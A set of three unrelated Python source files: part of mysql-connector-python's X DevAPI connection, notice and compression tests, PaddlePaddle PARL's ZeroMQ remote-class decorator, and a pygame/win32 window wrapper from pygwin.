with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(connect_kwargs)
LOGGER.error("InterfaceError not raised while testing "
"connect_kwargs: {}".format(connect_kwargs))
self.assertTrue("connection-attributes" in
context.exception.msg)
self.assertTrue("cannot start with '_'" in context.exception.msg)
# Test error is raised for attribute name size exceeds 32 characters
connection_attributes = [
{"foo": "bar", "p{}w".format("o"*31): "kaplot"},
{"p{}w".format("o"*31): "kaplot"},
{"baz": "zoom", "p{}w".format("o"*31): "kaplot", "a": "b"}
]
for conn_attr in connection_attributes:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection_attributes"] = conn_attr
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(connect_kwargs)
LOGGER.error("InterfaceError not raised while testing "
"connection_attributes: {}".format(conn_attr))
self.assertTrue("exceeds 32 characters limit size" in
context.exception.msg)
# Test error is raised for attribute value size exceeds 1024 characters
connection_attributes = [
{"foo": "bar", "pum": "kr{}nk".format("u"*1024)},
{"pum": "kr{}nk".format("u"*1024)},
{"baz": "zoom", "pum": "kr{}nk".format("u"*1024), "a": "b"}
]
for conn_attr in connection_attributes:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection-attributes"] = conn_attr
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(connect_kwargs)
LOGGER.error("InterfaceError not raised while testing "
"connection_attributes: {}".format(conn_attr))
self.assertTrue("exceeds 1024 characters limit size" in
context.exception.msg)
# Test valid generic values for the connection-attributes on URI
valid_conn_attrs = ["[]", "False", "True", "false", "true", "[valid]",
"[valid=0]", "[valid,valid2=0]", '["_valid=0]',
"[valid2='0']", "[valid=,valid2=0]", "['_valid=0]",
"[[_valid=0]]"]
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"])
for valid_attr in valid_conn_attrs:
uri_test = "{}?connection_attributes={}".format(uri, valid_attr)
mysqlx.get_session(uri_test)
# Test valid generic values when passing a dict with connection data
valid_conn_attrs = [{}, "False", "True", "false", "true", {"valid": ""},
{"valid": None}, {"valid1": 1}, True, False, 1, 0,
[], ['a1=2', 'a3'], {"valid"}, {"foo", "bar"}]
for conn_attr in valid_conn_attrs:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection_attributes"] = conn_attr
mysqlx.get_session(connect_kwargs)
# Test invalid generic values when passing a dict with connection data
invalid_conn_attrs = [{1:"1"}, {1:2}, {"_invalid":""}, {"_": ""},
123, 123.456, None, {"_invalid"}, ['_a1=2',]]
for conn_attr in invalid_conn_attrs:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection_attributes"] = conn_attr
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(connect_kwargs)
LOGGER.error("InterfaceError not raised while testing "
"connection_attributes: {}".format(conn_attr))
# Validate the user defined attributes are created in the server
# Test user defined connection attributes through a connection URL
connection_attributes = {
"foo": "bar",
"baz": "zoom",
"quash": "",
"puuuuum": "kaplot"
}
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"],
connection_attributes=connection_attributes)
# Verify user defined session-connection-attributes are in the server
my_session = mysqlx.get_session(uri)
row = my_session.sql("SHOW VARIABLES LIKE \"pseudo_thread_id\"").\
execute().fetch_all()[0]
get_attrs = ("SELECT ATTR_NAME, ATTR_VALUE FROM "
"performance_schema.session_account_connect_attrs "
"where PROCESSLIST_ID = \"{}\"")
rows = my_session.sql(get_attrs.format(row.get_string('Value'))).\
execute().fetch_all()
expected_attrs = connection_attributes.copy()
expected_attrs.update({
"_pid": str(os.getpid()),
"_platform": self.platform_arch,
"_source_host": socket.gethostname(),
"_client_name": "mysql-connector-python",
"_client_license": self.client_license,
"_client_version": ".".join([str(x) for x in VERSION[0:3]]),
"_os": self.os_ver
})
# Note that for an empty string "" value the server stores a Null value
expected_attrs["quash"] = "None"
for row in rows:
self.assertEqual(expected_attrs[row.get_string('ATTR_NAME')],
row.get_string('ATTR_VALUE'),
"Attribute {} with value {} differs of {}".format(
row.get_string('ATTR_NAME'),
row.get_string('ATTR_VALUE'),
expected_attrs[row.get_string('ATTR_NAME')]))
# Verify connection-attributes can be skiped to be set on server
# by URI as "connection_attributes"=false
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"],
connection_attributes="false")
my_session = mysqlx.get_session(uri)
row = my_session.sql("SHOW VARIABLES LIKE \"pseudo_thread_id\"").\
execute().fetch_all()[0]
get_attrs = ("SELECT ATTR_NAME, ATTR_VALUE FROM "
"performance_schema.session_account_connect_attrs "
"where PROCESSLIST_ID = \"{}\"")
rows = my_session.sql(get_attrs.format(row.get_string('Value'))).\
execute().fetch_all()
self.assertEqual(len(rows), 0, "connection attributes where created "
"while was specified to not do so: {}".format(rows))
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 19),
"MySQL 8.0.19+ is required for DNS SRV")
@unittest.skipIf(not HAVE_DNSPYTHON,
"dnspython module is required for DNS SRV")
def test_dns_srv(self):
# The value of 'dns-srv' must be a boolean
uri = "root:@localhost/myschema?dns-srv=invalid"
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
config = {"host": "localhost", "user": "root", "dns-srv": 0}
self.assertRaises(InterfaceError, mysqlx.get_session, config)
config = {"host": "localhost", "user": "root", "dns-srv": 1}
self.assertRaises(InterfaceError, mysqlx.get_session, config)
config = {"host": "localhost", "user": "root", "dns-srv": None}
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Using Unix domain sockets with DNS SRV lookup is not allowed
uri = "mysqlx+srv://root:@localhost/myschema?socket=/tmp/mysql.sock"
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Specifying a port number with DNS SRV lookup is not allowed
uri = "mysqlx+srv://root:@localhost:33060/myschema"
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Specifying multiple hostnames with DNS SRV look up is not allowed
uri = "mysqlx+srv://root:@[host1, host2, host3]/myschema"
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# The option 'dns-srv' is now allowed in connection string options
uri = "mysqlx+srv://root:@localhost/myschema?dns-srv=true"
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
def test_context_manager(self):
"""Test mysqlx.get_session() context manager."""
with mysqlx.get_session(self.connect_kwargs) as session:
self.assertIsInstance(session, mysqlx.Session)
self.assertTrue(session.is_open())
self.assertFalse(session.is_open())
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 20), "XPlugin not compatible")
class MySQLxInnitialNoticeTests(tests.MySQLxTests):
def setUp(self):
self.connect_kwargs = tests.get_mysqlx_config()
self.settings = {
"user": "root",
"password": "",
"host": "localhost",
"ssl-mode": "disabled",
"compression": "disabled",
}
def _server_thread(self, host="localhost", port=33061, notice=1):
stream = ServerSocketStream()
stream.start_receive(host, port)
reader = MessageReader(stream)
writer = MessageWriter(stream)
protocol = ServerProtocol(reader, writer)
# Read message header
hdr = stream.read(5)
msg_len, msg_type = struct.unpack("<LB", hdr)
_ = stream.read(msg_len - 1)
self.assertEqual(msg_type, 1)
# Send server capabilities
stream.sendall(b'\x05\x00\x00\x00\x0b\x08\x05\x1a\x00P\x01\x00'
b'\x00\x02\n\x0f\n\x03tls\x12\x08\x08\x01\x12\x04'
b'\x08\x07@\x00\nM\n\x19authentication.mechanisms'
b'\x120\x08\x03",\n\x11\x08\x01\x12\r\x08\x08J\t\n'
b'\x07MYSQL41\n\x17\x08\x01\x12\x13\x08\x08J\x0f\n'
b'\rSHA256_MEMORY\n\x1d\n\x0bdoc.formats\x12\x0e'
b'\x08\x01\x12\n\x08\x08J\x06\n\x04text\n\x1e\n'
b'\x12client.interactive\x12\x08\x08\x01\x12\x04'
b'\x08\x07@\x00\nn\n\x0bcompression\x12_\x08\x02'
b'\x1a[\nY\n\talgorithm\x12L\x08\x03"H\n\x18\x08'
b'\x01\x12\x14\x08\x08J\x10\n\x0edeflate_stream\n'
b'\x15\x08\x01\x12\x11\x08\x08J\r\n\x0blz4_message'
b'\n\x15\x08\x01\x12\x11\x08\x08J\r\n\x0b'
b'zstd_stream\n\x1c\n\tnode_type\x12\x0f\x08\x01'
b'\x12\x0b\x08\x08J\x07\n\x05mysql\n \n\x14'
b'client.pwd_expire_ok\x12\x08\x08\x01\x12\x04\x08'
b'\x07@\x00\x01\x00\x00\x00\x00')
# read client capabilities
frame_size, frame_type = struct.unpack("<LB", stream.read(5))
_ = stream.read(frame_size - 1)
self.assertEqual(frame_type, 2)
frame_size, frame_type = struct.unpack("<LB", stream.read(5))
self.assertEqual(frame_type, 4)
## Read payload
_ = stream.read(frame_size - 1)
# send handshake
if notice == 1:
# send empty notice
stream.sendall(b"\x01\x00\x00\x00\x0b")
else:
# send notice frame with explicit default
stream.sendall(b"\x03\x00\x00\x00\x0b\x08\x01")
# send auth start
protocol.send_auth_continue_server("00000000000000000000")
# Capabilities are not check for ssl-mode: disabled
# Reading auth_continue from client
hdr = stream.read(5)
msg_len, msg_type = struct.unpack("<LB", hdr)
self.assertEqual(msg_type, 5)
# Read payload
_ = stream.read(msg_len - 1)
# Send auth_ok
protocol.send_auth_ok()
# Read query message
hdr = stream.read(5)
msg_len, msg_type = struct.unpack("<LB", hdr)
self.assertEqual(msg_type, 12)
# Read payload
_ = stream.read(msg_len - 1)
# send empty notice
if notice == 1:
# send empty notice
stream.sendall(b"\x01\x00\x00\x00\x0b")
else:
# send notice frame with explicit default
stream.sendall(b"\x03\x00\x00\x00\x0b\x08\x01")
# msg_type: 12 Mysqlx.Resultset.ColumnMetaData
stream.sendall(b"\x32\x00\x00\x00\x0c"
b"\x08\x07\x40\xff\x01\x50\xc0\x01\x58\x10\x12"
b"\x08\x44\x61\x74\x61\x62\x61\x73\x65\x1a\x08"
b"\x44\x61\x74\x61\x62\x61\x73\x65\x22\x08\x53"
b"\x43\x48\x45\x4d\x41\x54\x41\x2a\x00\x32\x00"
b"\x3a\x03\x64\x65\x66")
# send unexpected notice
if notice == 1:
# send empty notice
stream.sendall(b"\x01\x00\x00\x00\x0b")
else:
# send notice frame with explicit default
stream.sendall(b"\x03\x00\x00\x00\x0b\x08\x01")
# msg_type: 13 Mysqlx.Resultset.Row
# information_schema
stream.sendall(b"\x16\x00\x00\x00\x0d"
b"\x0a\x13\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69"
b"\x6f\x6e\x5f\x73\x63\x68\x65\x6d\x61\x00"
# myconnpy
b"\x0c\x00\x00\x00\x0d"
b"\x0a\x09\x6d\x79\x63\x6f\x6e\x6e\x70\x79\x00"
b"\x09\x00\x00\x00\x0d"
# mysql
b"\x0a\x06\x6d\x79\x73\x71\x6c\x00"
b"\x16\x00\x00\x00\x0d"
# performance_schema
b"\x0a\x13\x70\x65\x72\x66\x6f\x72\x6d\x61\x6e"
b"\x63\x65\x5f\x73\x63\x68\x65\x6d\x61\x00"
b"\x07\x00\x00\x00\x0d"
# sys
b"\x0a\x04\x73\x79\x73\x00")
# msg_type: 14 Mysqlx.Resultset.FetchDone
stream.sendall(b"\x01\x00\x00\x00\x0e")
# msg_type: 11 Mysqlx.Notice.Frame
stream.sendall(b"\x0f\x00\x00\x00\x0b\x08\x03\x10\x02\x1a\x08\x08"
b"\x04\x12\x04\x08\x02\x18\x00")
# send unexpected notice
if notice == 1:
# send empty notice
stream.sendall(b"\x01\x00\x00\x00\x0b")
else:
# send notice frame with explicit default
stream.sendall(b"\x03\x00\x00\x00\x0b\x08\x01")
# msg_type: 17 Mysqlx.Sql.StmtExecuteOk
stream.sendall(b"\x01\x00\x00\x00\x11")
stream.sendall(b"\x01\x00\x00\x00\x00")
# Read message close connection
hdr = stream.read(5)
msg_len, msg_type = struct.unpack("<LB", hdr)
# Read payload
_ = stream.read(msg_len - 1)
self.assertEqual(msg_type, 7)
# Close socket
stream.close()
@unittest.skipIf(HAVE_MYSQLXPB_CEXT == False, "C Extension not available")
def test_initial_empty_notice_cext(self):
connect_kwargs = self.connect_kwargs.copy()
host = "localhost"
port = connect_kwargs["port"] + 10
worker1 = Thread(target=self._server_thread, args=[host, port, 1])
worker1.daemon = True
worker1.start()
sleep(1)
settings = self.settings.copy()
settings["port"] = port
settings["use_pure"] = False
session = mysqlx.get_session(settings)
rows = session.sql("show databases").execute().fetch_all()
self.assertEqual(rows[0][0], "information_schema")
session.close()
@unittest.skipUnless(HAVE_PROTOBUF, "Protobuf not available")
def test_initial_empty_notice_pure(self):
connect_kwargs = self.connect_kwargs.copy()
host = "localhost"
port = connect_kwargs["port"] + 20
worker2 = Thread(target=self._server_thread, args=[host, port, 1])
worker2.daemon = True
worker2.start()
sleep(2)
settings = self.settings.copy()
settings["port"] = port
settings["use_pure"] = True
session = mysqlx.get_session(settings)
rows = session.sql("show databases").execute().fetch_all()
self.assertEqual(rows[0][0], "information_schema")
session.close()
@unittest.skipIf(HAVE_MYSQLXPB_CEXT == False, "C Extension not available")
def test_initial_notice_cext(self):
connect_kwargs = self.connect_kwargs.copy()
host = "localhost"
port = connect_kwargs["port"] + 11
worker1 = Thread(target=self._server_thread, args=[host, port, 2])
worker1.daemon = True
worker1.start()
sleep(1)
settings = self.settings.copy()
settings["port"] = port
settings["use_pure"] = False
session = mysqlx.get_session(settings)
rows = session.sql("show databases").execute().fetch_all()
self.assertEqual(rows[0][0], "information_schema")
session.close()
@unittest.skipUnless(HAVE_PROTOBUF, "Protobuf not available")
def test_initial_notice_pure(self):
connect_kwargs = self.connect_kwargs.copy()
host = "localhost"
port = connect_kwargs["port"] + 21
worker2 = Thread(target=self._server_thread, args=[host, port, 2])
worker2.daemon = True
worker2.start()
sleep(2)
settings = self.settings.copy()
settings["port"] = port
settings["use_pure"] = True
session = mysqlx.get_session(settings)
rows = session.sql("show databases").execute().fetch_all()
self.assertEqual(rows[0][0], "information_schema")
session.close()
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 20), "Compression not available")
class MySQLxCompressionTests(tests.MySQLxTests):
def setUp(self):
self.connect_kwargs = tests.get_mysqlx_config()
self.schema_name = self.connect_kwargs["schema"]
self.session = mysqlx.get_session(self.connect_kwargs)
def tearDown(self):
self.session.close()
def _get_mysqlx_bytes(self, session):
res = session.sql("SHOW STATUS LIKE 'Mysqlx_bytes%'").execute()
return {key: int(val) for key, val in res.fetch_all()}
def _get_random_data(self, size):
return "".join([random.choice(string.ascii_letters + string.digits)
for _ in range(size)])
def _set_compression_algorithms(self, algorithms):
self.session.sql("SET GLOBAL mysqlx_compression_algorithms='{}'"
"".format(algorithms)).execute()
def test_compression_negotiation(self):
config = self.connect_kwargs.copy()
res = self.session.sql(
"SHOW VARIABLES LIKE 'mysqlx_compression_algorithms'").execute()
default_algorithms = res.fetch_all()[0][1]
# Set default compression settings on the server
self._set_compression_algorithms("lz4_message,deflate_stream")
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
# The lz4 should have the highest priority
if HAVE_LZ4:
self.assertEqual("lz4_message", algorithm)
else:
self.assertEqual("deflate_stream", algorithm)
session.close()
# The zstd_stream should have the highest priority
self._set_compression_algorithms(
"zstd_stream,lz4_message,deflate_stream")
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
if HAVE_ZSTD:
self.assertEqual("zstd_stream", algorithm)
elif HAVE_LZ4:
self.assertEqual("lz4_message", algorithm)
else:
self.assertEqual("deflate_stream", algorithm)
session.close()
# Disable lz4 and zstd
self._set_compression_algorithms("deflate_stream")
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
self.assertEqual("deflate_stream", algorithm)
session.close()
# The compression algorithm negotiation should fail when there is no
# compression algorithm available in the server and compress is
# required
config["compression"] = "required"
self._set_compression_algorithms("")
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Using compress='disabled' should work even when there is no
# compression algorithm available in the server
config["compression"] = "disabled"
session = mysqlx.get_session(config)
session.close()
# Should fail when using an invalid compress option
config["compression"] = "invalid"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Restore the default compression algorithms
self._set_compression_algorithms(default_algorithms)
def test_compression_sizes(self):
coll_name = "compress_col"
# Test using the default compression settings on the server
session = mysqlx.get_session(self.connect_kwargs)
sizes = self._get_mysqlx_bytes(session)
self.assertEqual(sizes["Mysqlx_bytes_received_compressed_payload"], 0)
self.assertEqual(sizes["Mysqlx_bytes_received_uncompressed_frame"], 0)
self.assertGreater(sizes["Mysqlx_bytes_sent_compressed_payload"], 0)
self.assertGreater(sizes["Mysqlx_bytes_sent_uncompressed_frame"], 0)
session.close()
# Test the mysqlx.protocol.COMPRESSION_THRESHOLD < 1000 bytes
session = mysqlx.get_session(self.connect_kwargs)
schema = session.get_schema(self.schema_name)
coll = schema.create_collection(coll_name)
coll.add({"data": self._get_random_data(900)}).execute()
sizes = self._get_mysqlx_bytes(session)
self.assertEqual(sizes["Mysqlx_bytes_received_compressed_payload"], 0)
self.assertEqual(sizes["Mysqlx_bytes_received_uncompressed_frame"], 0)
self.assertGreater(sizes["Mysqlx_bytes_sent_compressed_payload"], 0)
self.assertGreater(sizes["Mysqlx_bytes_sent_uncompressed_frame"], 0)
schema.drop_collection(coll_name)
session.close()
# Test the mysqlx.protocol.COMPRESSION_THRESHOLD > 1000 bytes
session = mysqlx.get_session(self.connect_kwargs)
schema = session.get_schema(self.schema_name)
coll = schema.create_collection(coll_name)
coll.add({"data": self._get_random_data(2000)}).execute()
sizes = self._get_mysqlx_bytes(session)
self.assertGreater(sizes["Mysqlx_bytes_received_compressed_payload"], 0)
self.assertGreater(sizes["Mysqlx_bytes_received_uncompressed_frame"], 0)
self.assertGreater(sizes["Mysqlx_bytes_sent_compressed_payload"], 0)
self.assertGreater(sizes["Mysqlx_bytes_sent_uncompressed_frame"], 0)
schema.drop_collection(coll_name)
session.close()
def test_compression_algorithms(self):
config = self.connect_kwargs.copy()
res = self.session.sql(
"SHOW VARIABLES LIKE 'mysqlx_compression_algorithms'").execute()
default_algorithms = res.fetch_all()[0][1]
# Set the server compression algorithms
self._set_compression_algorithms(
"deflate_stream,lz4_message,zstd_stream")
# Test algorithms with a given order with aliases
config["compression-algorithms"] = "deflate,lz4"
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
self.assertEqual("deflate_stream", algorithm)
session.close()
if HAVE_LZ4:
config["compression-algorithms"] = "lz4,deflate"
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
self.assertEqual("lz4_message", algorithm)
session.close()
# Test with unsupported algorithms by the client
config["compression-algorithms"] = "unsupported,deflate"
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
self.assertEqual("deflate_stream", algorithm)
session.close()
# Test with compression="required" and without compression algorithms
config["compression"] = "required"
config["compression-algorithms"] = []
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
if HAVE_LZ4:
self.assertEqual("lz4_message", algorithm)
else:
self.assertEqual("deflate_stream", algorithm)
session.close()
# Test with compression="required" and with unsupported compression
# algorithms
config["compression"] = "required"
config["compression-algorithms"] = "unsupported"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Test with compression="required", with supported compression
# algorithms, but not supported by the server
self._set_compression_algorithms("lz4_message")
config["compression"] = "required"
config["compression-algorithms"] = "deflate"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Test with compression="preferred" and with unsupported compression
# algorithms
config["compression"] = "preferred"
config["compression-algorithms"] = "unsupported"
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
self.assertIsNone(algorithm) # None means that compression is disabled
session.close()
# Test with compresison="disabled" and with valid compression
# algorithms
config["compression"] = "disabled"
config["compression-algorithms"] = "deflate"
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
self.assertIsNone(algorithm) # None means that compression is disabled
session.close()
del config["compression"]
# Test with unsupported algorithms by the server
if not HAVE_LZ4:
# Disable lz4
self._set_compression_algorithms("deflate_stream")
config["compression-algorithms"] = "lz4"
session = mysqlx.get_session(config)
algorithm = session.get_connection().protocol.compression_algorithm
# None means that compression is disabled
self.assertIsNone(algorithm)
# Restore the default compression algorithms
self._set_compression_algorithms(default_algorithms)
|
remote_decorator.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pyarrow
import threading
import time
import traceback
import zmq
from parl.remote import remote_constants
from parl.utils import get_ip_address, logger, to_str, to_byte
from parl.utils.exceptions import SerializeError, DeserializeError
from parl.utils.communication import loads_argument, dumps_return
"""
Three steps to create a remote class:
1. add a decroator(@parl.remote_class) before the definition of the class;
2. create an instance of remote class;
3. call function `as_remote` with server_ip and server_port.
@parl.remote_class
Class Simulator(object):
...
sim = Simulator()
sim.as_remote(server_ip='172.18.202.45', server_port=8001)
"""
def remote_class(cls):
class ClientWrapper(object):
"""
Wrapper for remote class in client side.
when as_remote function called, the object initialized in the client can
handle function call from server.
"""
def __init__(self, *args, **kwargs):
"""
Args:
args, kwargs: arguments for the initialisation of the unwrapped class.
"""
self.unwrapped = cls(*args, **kwargs)
self.zmq_context = None
self.poller = None
# socket for connecting server and telling ip and port of client to server
self.connect_socket = None
# socket for handle function call from server side
self.reply_socket = None
def _create_reply_socket(self, remote_ip, remote_port):
"""
In fact, we also have a socket server in client side. This server keeps running
and waits for requests (e.g. call a function) from server side.
"""
if remote_ip is None:
remote_ip = get_ip_address()
self.zmq_context = zmq.Context()
socket = self.zmq_context.socket(zmq.REP)
if remote_port is None:
try:
remote_port = socket.bind_to_random_port(addr="tcp://*")
except zmq.ZMQBindError:
logger.error(
'Can not bind to a random port, please set remote_port manually.'
)
sys.exit(1)
else:
socket.bind("tcp://*:{}".format(remote_port))
return socket, remote_ip, remote_port
def _connect_server(self, server_ip, server_port, remote_ip,
remote_port):
"""
Create the connection between client side and server side.
Args:
server_ip(str): the ip of the server.
server_port(int): the connection port of the server.
remote_ip: the ip of the client itself.
remote_port: the port of the client itself,
which used to create reply socket.
"""
self.reply_socket, local_ip, local_port = self._create_reply_socket(
remote_ip, remote_port)
self.reply_socket.linger = 0
socket = self.zmq_context.socket(zmq.REQ)
socket.connect("tcp://{}:{}".format(server_ip, server_port))
logger.info("connecting {}:{}".format(server_ip, server_port))
client_addr = '{}:{}'.format(local_ip, local_port)
socket.send_multipart(
[remote_constants.CONNECT_TAG,
to_byte(client_addr)])
message = socket.recv_multipart()
self.client_id = message[1]
logger.info("connect server done, client_id: {}".format(
self.client_id))
self.connect_socket = socket
self.connect_socket.linger = 0
def _exit_remote(self):
self.poller.unregister(self.connect_socket)
self.connect_socket.close()
self.reply_socket.close()
# The program may hang when destroying zmq context manually.
# It will be destroyed automatically by the garbage collection mechanism of python,
# though it may raise some exceptions in C++.
#self.zmq_context.destroy()
def _heartbeat_loop(self):
"""
Periodically detect whether the server is alive or not
"""
self.poller = zmq.Poller()
self.poller.register(self.connect_socket, zmq.POLLIN)
while True:
self.connect_socket.send_multipart(
[remote_constants.HEARTBEAT_TAG, self.client_id])
# wait for at most 10s to receive response
socks = dict(self.poller.poll(10000))
if socks.get(self.connect_socket) == zmq.POLLIN:
_ = self.connect_socket.recv_multipart()
else:
logger.warning(
'[HeartBeat] Server no response, will exit now!')
self._exit_remote()
break
# HeartBeat interval 10s
time.sleep(remote_constants.HEARTBEAT_INTERVAL_S)
def __getattr__(self, attr):
"""
Call the function of the unwrapped class.
"""
def wrapper(*args, **kwargs):
return getattr(self.unwrapped, attr)(*args, **kwargs)
return wrapper
def _reply_loop(self):
while True:
message = self.reply_socket.recv_multipart()
try:
function_name = to_str(message[1])
data = message[2]
args, kwargs = loads_argument(data)
ret = getattr(self.unwrapped, function_name)(*args,
**kwargs)
ret = dumps_return(ret)
except Exception as e:
error_str = str(e)
logger.error(error_str)
if type(e) == AttributeError:
self.reply_socket.send_multipart([
remote_constants.ATTRIBUTE_EXCEPTION_TAG,
to_byte(error_str)
])
elif type(e) == SerializeError:
self.reply_socket.send_multipart([
remote_constants.SERIALIZE_EXCEPTION_TAG,
to_byte(error_str)
])
elif type(e) == DeserializeError:
self.reply_socket.send_multipart([
remote_constants.DESERIALIZE_EXCEPTION_TAG,
to_byte(error_str)
])
else:
traceback_str = str(traceback.format_exc())
logger.error('traceback:\n{}'.format(traceback_str))
self.reply_socket.send_multipart([
remote_constants.EXCEPTION_TAG,
to_byte(error_str + '\ntraceback:\n' +
traceback_str)
])
continue
self.reply_socket.send_multipart(
[remote_constants.NORMAL_TAG, ret])
def as_remote(self,
server_ip,
server_port,
remote_ip=None,
remote_port=None):
"""
Client will connect server and wait for function calls from server side.
Args:
server_ip(str): server's ip
server_port(int): server's port
remote_ip: the ip of the client itself.
remote_port: the port of the client itself,
which used to create reply socket.
"""
self._connect_server(server_ip, server_port, remote_ip,
remote_port)
reply_thread = threading.Thread(target=self._reply_loop)
reply_thread.setDaemon(True)
reply_thread.start()
self._heartbeat_loop()
def remote_closed(self):
"""
Check whether as_remote mode is closed
"""
assert self.reply_socket is not None, 'as_remote function should be called first!'
assert self.connect_socket is not None, 'as_remote function should be called first!'
return self.reply_socket.closed and self.connect_socket.closed
return ClientWrapper
|
_win.py
|
from pygwin.surface import surface as _surface
from pygwin.tray import tray as _tray
from datetime import datetime as _dt
from pygwin.image import save as _s
from pygwin._pg import pg as _pg
import pygwin.image as _img
try:
import win32job as _w32j
import win32api as _w32a
import win32con as _w32c
import win32gui as _w32g
nonwin32api = False
except:
nonwin32api = True
import sys as _sys
import warnings as _warn
import winwerror as _we
import requests as _req
import tempfile as _tf
import threading as _t
import pickle as _p
import mouse as _m
import time as _ti
class _win(_surface):
def __init__(self, iconpath=None):
self._orig = _pg.display.get_surface()
super().__init__(self._orig.get_size())
self._orig = _pg.display.get_surface()
self._clock = _pg.time.Clock()
self._withfps = False
self._iconpath = iconpath
self._isallowdrag = False
# self._issmartdrag = False
if iconpath != None:
self.tray = _tray(self.title,iconpath)
def update(self, fps=-1):
if fps != -1:
self._clock.tick(fps)
self._withfps = True
_pg.display.update()
def resize(self, size=None):
if size == None:
return self.size
else:
self._orig = _pg.display.set_mode(size)
def title():
def fget(self):
return _pg.display.get_caption()[0]
def fset(self, value):
if type(value) != str:
return
_pg.display.set_caption(value)
def fdel(self):
pass
return locals()
title = property(**title())
def icon(value):
_pg.display.set_icon(_pg.image.load(value))
self._iconpath = iconpath
def size():
def fget(self):
return _pg.display.get_window_size()
def fset(self, value):
if type(value) in [list,tuple]:
return
_pg.display.set_mode(value)
def fdel(self):
pass
return locals()
size = property(**size())
def fullscreen(self):
_pg.display.toogle_fullscreen()
def close(self):
# _w32g.PostMessage(self.hwnd, _w32c.WM_CLOSE, 0, 0)
_pg.display.quit()
try:self.tray.stop()
except:pass
def focus(self):
if not nonwin32api:
self.hide()
self.show()
_w32g.BringWindowToTop(self.hwnd)
_w32g.ShowWindow(self.hwnd, _w32c.SW_SHOWNORMAL)
_w32g.SetForegroundWindow(self.hwnd)
def hide(self):
if not nonwin32api:
_w32g.ShowWindow(self.hwnd, _w32c.SW_HIDE)
def show(self):
if not nonwin32api:
_w32g.ShowWindow(self.hwnd, _w32c.SW_SHOW)
def move(self, x, y):
if not nonwin32api:
rect = self._getRect()
_w32g.MoveWindow(self.hwnd, int(x), int(y),
rect[2]-x, rect[3]-y, 0)
def screenshot(self, path):
_s(self._orig, path)
return path
def center(self,x=_pg.display.get_desktop_sizes()[0][0]/2,
y=_pg.display.get_desktop_sizes()[0][1]/2):
self.move(x-self.size[0]/2,y-self.size[1]/2)
def _getRect(self):
if not nonwin32api:
return _w32g.GetWindowRect(self.hwnd)
def denyDrag(self):
if not nonwin32api:
self._isallowdrag = True
def loop(self):
while self._isallowdrag:
pos = _m.get_position()
pos = [pos[i]-self.position[i] for i in range(2)]
if pos[0] < self._getRect()[2]-137:
if pos[1] < 30:
_m.release('left')
_t.Thread(target=lambda:loop(self),daemon=1).start()
def allowDrag(self):
if not nonwin32api:
self._isallowdrag = False
# def smartDrag(self, x):
# self.allowDrag()
# self._issmartdrag = x
# if x:
# self._isallowdrag = True
# def loop(self):
# wsd = None
# while self._issmartdrag:
# self.update()
# pos = _m.get_position()
# pos = [pos[i]-self.position[i] for i in range(2)]
# if pos[0] < _w32g.GetWindowRect(self.hwnd)[2]-137:
# if pos[1] < 30:
# if _m.is_pressed('left'):
# _m.release('left')
# if wsd == None:
# wsd = pos+list(self.position)
# else:
# if wsd != pos+list(self.position):
# self.move(wsd[2]+(pos[0]-wsd[0]),
# wsd[3]+(pos[1]-wsd[1]))
# else:
# wsd = None
# _ti.sleep(0.5)
# _t.Thread(target=lambda:loop(self),daemon=1).start()
@property
def position(self):
if not nonwin32api:
rect = self._getRect()
x = rect[0]
y = rect[1]
return (x, y)
@property
def rawFps(self):
if self._withfps:
return self._clock.get_fps()
else:
return float(f'2010.{_dt.now().year}')
@property
def fps(self):
return int(self.rawFps)
@property
def hwnd(self):
if not nonwin32api:
return _pg.display.get_wm_info()['window']
@property
def visible(self):
if not nonwin32api:
return _w32g.IsWindowVisible(self._win)
